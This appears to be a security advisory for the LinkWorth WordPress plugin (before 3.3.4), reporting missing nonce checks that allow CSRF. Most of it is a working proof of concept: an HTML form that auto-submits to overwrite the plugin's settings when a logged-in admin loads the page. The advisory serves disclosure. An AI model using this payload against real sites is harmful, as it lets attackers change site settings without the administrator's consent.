LinkWorth Plugin < 3.3.4 – Arbitrary Setting Update via CSRF

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change settings via a CSRF attack.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=lw-settings" method="POST">
    <input type="text" name="lw_ops[lw_sidebar]" value="0">
    <input type="text" name="lw_ops[lw_sidebarwidget]" value="0">
    <input type="text" name="lw_ops[lw_linktype]" value="0">
    <input type="text" name="lw_ops[website_id]" value="hacked">
    <input type="text" name="lw_ops[website_hash]" value="hacked">
    <input type="text" name="lw_ops[billboard_base]" value="pages">
    <input type="text" name="lw_ops[lw_linkcolor]" value="1">
    <input type="text" name="lw_ops[lw_linksize]" value="12">
    <input type="text" name="lw_update_settings" value="Update Settings »">
</form>
<script>
    document.getElementById("test").submit();
</script>